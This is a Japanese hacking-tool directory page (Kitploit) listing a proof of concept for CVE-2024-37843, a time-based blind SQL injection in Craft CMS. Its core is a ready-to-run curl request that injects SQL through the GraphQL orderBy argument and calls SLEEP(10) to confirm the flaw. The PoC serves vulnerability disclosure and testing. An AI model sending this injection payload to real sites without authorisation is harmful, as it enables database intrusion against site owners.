Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-37843-POC — CVE-2024-37843のPOC。Craft CMS 時間ベースのブラインドSQLi | Kitploit
ツール/GitHubGitHub/gsmith257-cyber/cve-2024-37843-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubgsmith257-cyber/cve-2024-37843-poc

CVE-2024-37843-POC

CVE-2024-37843のPOC。Craft CMS 時間ベースのブラインドSQLi

リポジトリを見る
412年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-37843-POC

CVE-2024-37843のPOCです。Craft CMSの時間ベースのブラインドSQLインジェクション

詳細はブログで確認できます

POC

root@kitploit:~
curl -X POST '<URL>/api/' -H 'Content-Type:application/json' -d '{"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId` -- \\\\` \\n \\n LIMIT 5) AS `subquery`\\nINNER JOIN `assets` `assets` ON `assets`.`id` = `subquery`.`elementsId`\\nINNER JOIN `volumefolders` `volumeFolders` ON `volumeFolders`.`id` = `assets`.`folderId`\\nINNER JOIN `elements` `elements` ON `elements`.`id` = `subquery`.`elementsId`\\nINNER JOIN `elements_sites` `elements_sites` ON `elements_sites`.`id` = `subquery`.`elementsSitesId`\\nINNER JOIN `content` `content` ON `content`.`id` = `subquery`.`contentId`\\nORDER BY `assets`.`volumeId`; SELECT SLEEP(10) ; --\", limit: 5){filename}}"}'

SLEEP(10)は必要に応じて調整できますが、このcurlリクエストに対する応答が10秒を超える場合、APIは脆弱です。

ツールをダウンロード